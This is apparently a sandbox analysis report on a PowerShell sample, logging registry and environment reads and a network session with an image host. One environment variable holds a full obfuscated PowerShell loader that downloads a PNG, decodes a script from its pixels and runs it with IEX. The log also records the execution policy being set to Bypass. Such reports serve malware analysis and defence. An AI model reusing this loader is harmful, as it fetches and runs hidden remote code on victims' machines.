Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 9
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 9
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (4)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 True 2
Fn
Create Mapping - filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System (8)
»
Operation Additional Information Success Count Logfile
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Get Computer Name result_out = YKYD69Q True 1
Fn
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (12)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 1
Fn
Create mutex_name = Global\.net clr networking True 5
Fn
Release - True 1
Fn
Release mutex_name = Global\.net clr networking True 5
Fn
Environment (149)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 136
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = ComsPec, result_out = C:\Windows\system32\cmd.exe True 2
Fn
Get Environment String name = sULrV True 1
Fn
Get Environment String name = sULrV, result_out = . ( $sHelLId[1]+$shELlId[13]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'ype -As'+'sembly'+'Name 9axSystem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr Syste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr By'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[Syst'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]34).ReplaCE(([ChAr]98+[ChAr]83+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]36)) True 1
Fn
Get Environment String name = comSpeC, result_out = C:\Windows\system32\cmd.exe True 2
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Network Behavior
DNS (1)
»
Operation Additional Information Success Count Logfile
Resolve Name host = images2.imgbox.com, address_out = 66.254.122.104, 66.254.122.100, 66.254.122.102 True 1
Fn
TCP Sessions (1)
»
Information Value
Total Data Sent 373 bytes
Total Data Received 381.16 KB
Contacted Host Count 1
Contacted Hosts 66.254.122.104:443
TCP Session #1
»
Information Value
Handle 0x4e8
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 66.254.122.104
Remote Port 443
Local Address 0.0.0.0
Local Port 49165
Data Sent 373 bytes
Data Received 381.16 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 66.254.122.104, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 122, size_out = 122 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 93, size_out = 93 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 4588, size_out = 4588 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 331, size_out = 331 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 4, size_out = 4 True 1
Fn
Data
Send flags = NO_FLAG_SET, size = 134, size_out = 134 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size = 117, size_out = 117 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 176, size_out = 176 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 160, size_out = 160 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1440, size_out = 1440 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 160, size_out = 160 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 16416 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 2782 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 13634, size_out = 8928 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 4706, size_out = 1452 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3254, size_out = 3254 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 9060 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 7356, size_out = 3472 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3884, size_out = 3884 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 1351 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 2297, size_out = 2297 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 9314 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 7102, size_out = 7102 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 16416 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 16416 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 16416 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 13234 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3182, size_out = 3182 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 4776 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 11640, size_out = 11640 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 5030 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 11386, size_out = 3472 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 7914, size_out = 5240 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 2674, size_out = 2674 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 3832 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 12584, size_out = 12584 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 9010 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 7406, size_out = 3472 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3934, size_out = 3220 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 714, size_out = 714 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 16416 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 16416 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 4848 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 11568, size_out = 11568 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 1495 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 2153, size_out = 2153 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 16416, size_out = 9458 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 6958, size_out = 6958 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 3648, size_out = 3648 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 11488, size_out = 11488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image